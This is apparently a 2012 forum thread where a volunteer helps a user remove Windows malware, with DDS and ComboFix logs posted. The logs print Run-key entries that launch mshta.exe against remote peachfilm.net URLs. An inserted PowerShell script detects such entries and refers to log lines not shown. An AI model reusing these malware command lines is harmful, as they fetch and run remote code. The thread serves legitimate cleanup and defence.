uRun: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
uRun: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
uRunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [Skytel] Skytel.exe
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
LSP: c:\windows\system32\wpclsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - component: c:\program files\mcafee\siteadvisor\components\McFFPlg.dll
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
FF - plugin: c:\program files\mozilla firefox\plugins\NPTURNMED.dll
FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
FF - plugin: c:\windows\system32\npDeployJava1.dll
FF - plugin: c:\windows\system32\npmproxy.dll
.
---- FIREFOX POLICIES ----
.
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
R1 MpKsl0ef4776f;MpKsl0ef4776f;c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys [2012-5-28 29904]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
.
=============== Created Last 30 ================
.
2012-05-28 05:57:08	29904	----a-w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\MpKsl0ef4776f.sys
2012-05-28 05:06:52	6737808	----a-w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{a66fbb99-c8ac-44bc-83f6-4037b1f477f7}\mpengine.dll
2012-05-23 20:07:25	6737808	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2012-05-22 05:16:47	713784	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
2012-05-22 05:09:57	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 08:37:25	6737808	----a-w-	c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
2012-05-19 05:43:51	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57:56	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57:42	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57:41	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57:34	1404928	----a-w-	c:\program files\common files\microsoft shared\ink\InkObj.dll
2012-05-14 22:57:32	936960	----a-w-	c:\program files\common files\microsoft shared\ink\journal.dll
2012-05-14 22:57:20	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57:19	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57:19	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57:18	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:57:18	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:56:51	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56:50	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56:49	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-05-09 04:58:39	592824	----a-w-	c:\program files\mozilla firefox\gkmedias.dll
2012-05-09 04:58:39	44472	----a-w-	c:\program files\mozilla firefox\mozglue.dll
.
==================== Find3M ====================
.
2012-05-05 06:08:36	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-05-05 06:08:36	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-04-04 19:56:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44:12	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44:12	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-02-29 15:11:45	5120	----a-w-	c:\windows\system32\wmi.dll
2012-02-29 15:11:42	172032	----a-w-	c:\windows\system32\wintrust.dll
2012-02-29 15:09:53	157696	----a-w-	c:\windows\system32\imagehlp.dll
2012-02-29 13:32:37	12800	----a-w-	c:\windows\system32\drivers\fs_rec.sys
2012-02-28 11:30:48	916992	----a-w-	c:\windows\system32\wininet.dll
2012-02-28 11:25:41	43520	----a-w-	c:\windows\system32\licmgr10.dll
2012-02-28 11:25:17	1469440	----a-w-	c:\windows\system32\inetcpl.cpl
2012-02-28 11:25:03	71680	----a-w-	c:\windows\system32\iesetup.dll
2012-02-28 11:25:03	109056	----a-w-	c:\windows\system32\iesysprep.dll
2012-02-28 10:07:57	385024	----a-w-	c:\windows\system32\html.iec
2012-02-28 08:12:52	133632	----a-w-	c:\windows\system32\ieUnatt.exe
2012-02-28 08:08:30	1638912	----a-w-	c:\windows\system32\mshtml.tlb
.
============= FINISH: 3:18:17.35 ===============


----------



## gagraptor (May 23, 2012)

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-08-26.01)
.
Microsoft® Windows Vista Home Premium 
Boot Device: \Device\HarddiskVolume2
Install Date: 7/31/2007 3:06:08 PM
System Uptime: 5/28/2012 1:45:32 AM (2 hours ago)
.
Motherboard: TOSHIBA | | IALAA
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-56 | Socket M2/S1G1 | 1800/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 231 GiB total, 26.845 GiB free.
E: is CDROM ()
F: is CDROM ()
G: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft 6to4 Adapter
Device ID: ROOT\*6TO4MP\0000
Manufacturer: Microsoft
Name: Microsoft 6to4 Adapter
PNP Device ID: ROOT\*6TO4MP\0000
Service: tunnel
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Tun Miniport Adapter
Device ID: ROOT\*TUNMP\0001
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TUNMP\0001
Service: tunmp
.
Class GUID: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Description: Canon MX860 ser Network
Device ID: ROOT\CANON_IJ_NETWORK\0000
Manufacturer: Canon
Name: Canon MX860 ser Network
PNP Device ID: ROOT\CANON_IJ_NETWORK\0000
Service: StillCam
.
==== System Restore Points ===================
.
.
==== Installed Programs ======================
.
µTorrent
Adobe Flash Player 11 Plugin
Adobe Flash Player ActiveX
Adobe Reader 8.1.5
Adobe Shockwave Player
Adobe® Photoshop® Album Starter Edition 3.2
AGEIA PhysX v7.07.09
Akamai NetSession Interface
Akamai NetSession Interface Service
ALPS Touch Pad Driver
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Atheros Driver Installation Program
ATI Catalyst Install Manager
ATI Uninstaller
Bejeweled Deluxe 1.87
Bonjour
Camera Assistant Software for Toshiba
Canon IJ Network Scan Utility
Canon IJ Network Tool
Canon MX860 series MP Drivers
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center Localization Chinese Standard
Catalyst Control Center Localization Chinese Traditional
Catalyst Control Center Localization Dutch
Catalyst Control Center Localization Finnish
Catalyst Control Center Localization French
Catalyst Control Center Localization German
Catalyst Control Center Localization Greek
Catalyst Control Center Localization Hungarian
Catalyst Control Center Localization Italian
Catalyst Control Center Localization Japanese
Catalyst Control Center Localization Korean
Catalyst Control Center Localization Norwegian
Catalyst Control Center Localization Polish
Catalyst Control Center Localization Portuguese
Catalyst Control Center Localization Russian
Catalyst Control Center Localization Spanish
Catalyst Control Center Localization Swedish
Catalyst Control Center Localization Thai
Catalyst Control Center Localization Turkish
ccc-core-static
ccc-utility
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
CD/DVD Drive Acoustic Silencer
CloneDVD2
Counter-Strike 1.0
Counter-Strike 1.6
Counter Strike 1.6 - By PirocaHP.F!N4LShare
Counter Strike 1.6 - Pack 112 Mapas - By PirocaHP F!N4LShare
D3DX10
Dell Driver Download Manager
Dell V305
DivX Converter
DivX Plus DirectShow Filters
DivX Setup
DivX Version Checker
DVD MovieFactory for TOSHIBA
DVDFab (Platinum/Gold/HD Decrypter) (Option: Mobile) 5.0.9.0
EA SPORTS(TM) Cricket 07
EPSON Easy Photo Print
EPSON WorkForce 30 Series Printer Uninstall
Google Chrome
Google Talk (remove only)
Google Talk Plugin
HD Tune 2.55
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
iPhone Configuration Utility
iTunes
Java Auto Updater
Java(TM) 6 Update 29
Java(TM) 7 Update 3
Java(TM) SE Development Kit 7 Update 2
Java(TM) SE Runtime Environment 6
JavaFX 2.0.2 SDK
JavaFX 2.0.3
K-Lite Mega Codec Pack 6.2.0
KB408682
Magic DVD Ripper V5.1.1
Magic ISO Maker v5.5 (build 0272)
Malwarebytes Anti-Malware version 1.61.0.1400
Max Payne
McAfee SiteAdvisor
Media Player Classic - Home Cinema v. 1.3.1249.0
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4 Client Profile
Microsoft Application Error Reporting
Microsoft Flight Simulator X
Microsoft Office XP Professional with FrontPage
Microsoft Primary Interoperability Assemblies 2005
Microsoft Security Client
Microsoft Security Essentials
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Works
Microsoft XML Parser
Mozilla Firefox 11.0 (x86 en-US)
MSVC80_x86
MSVCRT
MSXML 4.0 SP2 (KB927978)
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB941833)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP2 Parser and SDK
Need for Speed Underground 2
Need for Speed Most Wanted
Nero BackItUp
Nero BackItUp and Burn
Nero BurnRights
Nero Express
Nero RescueAgent
neroxml
Oblivion
OGA Notifier 2.0.0048.0
Pando Media Booster
PC Connectivity Solution
PCFriendly
Picasa 2
QuickTime
RealNetworks - Microsoft Visual C++ 2008 Runtime
Realtek 8169 PCI, 8168 and 8101E PCIe Ethernet Network Card Driver for Windows Vista
Realtek High Definition Audio Driver
RealUpgrade 1.1
Safari
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2657424)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2446708)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2478663)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2518870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2539636)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2572078)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2633870)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368)
Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)
Security Update for Windows Media Encoder (KB2447961)
Security Update for Windows Media Encoder (KB954156)
Security Update for Windows Media Encoder (KB979332)
Segoe UI
Skins
Skype 3.5
Spelling Dictionaries Support For Adobe Reader 8
Switch Sound File Converter
Synaptics Pointing Device Driver
Tales of Monkey Island
TeamViewer 6
Texas Instruments PCIxx21/x515/xx12 drivers.
TIPCI
TOSHIBA Assist
TOSHIBA Disc Creator
TOSHIBA DVD PLAYER
TOSHIBA Extended Tiles for Windows Mobility Center
TOSHIBA Flash Cards Support Utility
TOSHIBA Hardware Setup
Toshiba Registration
TOSHIBA SD Memory Utilities
TOSHIBA Software Modem
TOSHIBA Software Upgrades
TOSHIBA Supervisor Password
TOSHIBA Value Added Package
TuneUp Companion 2.2.7
TypingMaster Pro
Unity Web Player
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217)
Utility Common Driver
uTorrentControl Toolbar
VC80CRTRedist - 8.0.50727.6195
VCRedistSetup
Veoh Giraffic Video Accelerator
Veoh Web Player
VeohTV BETA
VideoLAN VLC media player 0.8.6f
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Messenger
Windows Live Photo Common
Windows Live PIMT Platform
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Media Encoder 9 Series
Windows Media Player Firefox Plugin
WinImage
WinRAR archiver
Yahoo! Detect
Yahoo! Install Manager
Yahoo! Messenger
Zeus & Poseidon
.
==== Event Viewer Messages From Past Week ========
.
5/28/2012 12:57:13 AM, Error: Microsoft-Windows-SharedAccess_NAT [31004] - The DNS proxy agent was unable to allocate 0 bytes of memory. This may indicate that the system is low on virtual memory, or that the memory manager has encountered an internal error.
5/28/2012 1:48:09 AM, Error: Microsoft-Windows-DistributedCOM [10016] - The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
5/28/2012 1:47:38 AM, Error: Service Control Manager [7000] - The Parallel port driver service failed to start due to the following error: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
5/28/2012 1:47:31 AM, Error: PlugPlayManager [12] - The device 'PIONEER DVD-RW DVR-K17LF ATA Device' (IDE\CdRomPIONEER_DVD-RW_DVR-K17LF________________4.53____\5&383a5e59&0&0.0.0) disappeared from the system without first being prepared for removal.
5/28/2012 1:47:27 AM, Error: cdrom [15] - The device, \Device\CdRom0, is not ready for access yet.
5/28/2012 1:47:27 AM, Error: atapi [11] - The driver detected a controller error on \Device\Ide\IdePort2.
5/23/2012 3:53:51 PM, Error: EventLog [6008] - The previous system shutdown at 3:52:17 PM on 5/23/2012 was unexpected.
.
==== End Of File ===========================


----------



## gagraptor (May 23, 2012)

Also, I don't know if it helps, but my physical memory usage is always above 50%.


----------



## Mark1956 (May 7, 2011)

OK, thanks for the logs. Please now follow this to run Combofix and post the log.

IMPORTANT
I see you have a *P2P File Sharing Program* installed on your system: *uTorrent*.
As long as you continue to use these types of programs you can expect to get infected.
P2P file sharing is one of the most common sources for picking up infections.
Please uninstall the program from your system in *Programs & Features* via the *Control Panel.*
If you insist on keeping it on your system then please *DO NOT USE IT* until we are finished.

*STEP 1*

*NOTE:* If you have already used Combofix please delete the icon from your desktop.

Please download DeFogger and save it to your desktop.
Once downloaded, double-click on the *DeFogger* icon to start the tool.
The application window will appear.
You should now click on the *Disable* button to disable your CD Emulation drivers.
When it prompts you whether or not you want to continue, please click on the *Yes* button to continue.
When the program has completed you will see a *Finished!* message. Click on the *OK* button to exit the program.
If CD Emulation programs are present and have been disabled, *DeFogger* will now ask you to reboot the machine. Please allow it to do so by clicking on the *OK* button.

*STEP 2*

Please download *ComboFix* from one of the locations below and *save it to your Desktop. <-Important!!!*

Download Mirror #1
Download Mirror #2
Be sure to print out and follow these instructions: *A guide and tutorial on using ComboFix*

*Vista*/*Windows 7* users can skip the Recovery Console instructions and use the Windows DVD to boot into the Vista Recovery Environment or Windows 7 System Recovery Options if something goes awry. If you do not have a Windows 7 DVD then please create a Windows 7 Repair Disc. *XP* users need to install the Recovery Console first.

Temporarily *disable* your *anti-virus*, script blocking and any *anti-malware* real-time protection _*before*_ performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause _"unpredictable results"_. Click this link to see a list of such programs and how to disable them.
If ComboFix detects an older version of itself, you will be asked to update the program.
ComboFix will begin by showing a Disclaimer. Read it and click *I Agree* if you want to continue.
Follow the prompts and click on *Yes* to continue scanning for malware.
If using Windows 7 or Vista and you receive a UAC prompt asking if you want to continue running the program, you should press the *Continue* button.
When finished, please copy and paste the contents of C:\*ComboFix.txt* (_which will open after reboot_) in your next reply.
Be sure to *re-enable* your anti-virus and other security programs.
_-- Do not touch your mouse/keyboard until the ComboFix scan has completed, as this may cause the process to stall or the computer to lock._
_-- ComboFix will temporarily disable your desktop, and if interrupted may leave it disabled. If this occurs, please reboot to restore it._
_-- ComboFix disables autorun of all CD, floppy and USB devices to assist with malware removal and increase security._
If you no longer have access to your Internet connection after running ComboFix, please reboot to restore it. If that does not restore the connection, then follow the instructions for Manually restoring the Internet connection provided in the "_How to Guide_" you printed out earlier.


> *Do NOT use ComboFix* unless you have been instructed to do so by a Malware Removal Expert. It is a powerful tool intended by its creator to be used under the guidance and supervision of an expert, *NOT for general public or personal use*. *Using this tool incorrectly could lead to serious problems with your operating system such as preventing it from ever starting again.* This site, sUBs and myself *will not* be responsible for any damage caused to your machine by misusing or running ComboFix on your own. Please read *ComboFix's Disclaimer*.
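
The thread's underlying problem is an autostart entry that launches mshta.exe with a remote URL (the ComboFix log posted further down lists two such values under the HKCU Run key and two more parked under msconfig's startupreg). As an added example, written for this page and not part of Mark1956's post or of any tool used in the thread, the following PowerShell check enumerates the common Run/RunOnce keys and the msconfig startupreg entries and flags any command line that combines a script host with an http/https argument. The list of script hosts and the URL pattern are assumptions chosen for this illustration, not a list from the thread or from ComboFix.

```powershell
# Added example (not from the thread): triage check for autostart entries that hand a
# remote URL to a script host such as mshta.exe. Read-only; it changes nothing.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumed heuristic: script hosts that will fetch and run content from a URL given on
# their command line, paired with a remote scheme. Tune both for your environment.
$scriptHosts = 'mshta\.exe|wscript\.exe|cscript\.exe|rundll32\.exe|powershell\.exe'
$remote      = 'https?://'

function Test-SuspiciousAutostart {
    param([string]$CommandLine)
    # True when the value looks like "mshta.exe http://..." rather than a local program path.
    return ($CommandLine -match $scriptHosts) -and ($CommandLine -match $remote)
}

$findings = @()

# 1. Live autostart values under the Run / RunOnce keys.
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $item = Get-Item $key
    foreach ($name in $item.GetValueNames()) {
        $cmd = [string]$item.GetValue($name)
        if (Test-SuspiciousAutostart $cmd) {
            $findings += New-Object PSObject -Property @{
                Location = $key; Name = $name; Command = $cmd
            }
        }
    }
}

# 2. Entries the user disabled through msconfig live under startupreg, one subkey per
#    entry with the original command line in its "command" value. A disabled entry is
#    not running, but it still tells you the malware was present and can be re-enabled.
$msconfig = 'HKLM:\Software\Microsoft\Shared Tools\MSConfig\startupreg'
if (Test-Path $msconfig) {
    foreach ($sub in Get-ChildItem $msconfig) {
        $cmd = [string]$sub.GetValue('command')
        if (Test-SuspiciousAutostart $cmd) {
            $findings += New-Object PSObject -Property @{
                Location = $sub.PSPath; Name = $sub.PSChildName; Command = $cmd
            }
        }
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No script-host autostart entries with remote URLs found.'
} else {
    $findings | Format-List Location, Name, Command
}
```

Run it from an elevated PowerShell prompt so the HKLM keys are readable; it only reports, so removal is still left to whatever the helper prescribes. Hits are worth correlating with the mshta.exe command line Process Explorer shows for the running process, since the Run value and the live process should point at the same URL family.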


----------



## gagraptor (May 23, 2012)

ComboFix 12-05-28.05 - GAGAN 05/28/2012 22:36:29.1.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.999 [GMT -4:00]
Running from: c:\users\GAGAN\Downloads\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\xp
c:\programdata\xp\EBLib.dll
c:\programdata\xp\TPwSav.sys
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome.manifest
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome\content\overlay.xul
c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\install.rdf
c:\windows\system32\CTF
c:\windows\system32\CTF\ctfmon.txt
c:\windows\system32\CTF\Links\OtherProducts.html
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-29 )))))))))))))))))))))))))))))))
.
.
2012-05-28 05:06 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A66FBB99-C8AC-44BC-83F6-4037B1F477F7}\mpengine.dll
2012-05-23 20:07 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16	713784	------w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 08:37 . 2012-05-08 16:40	6737808	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-19 05:43 . 2012-05-19 09:50	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
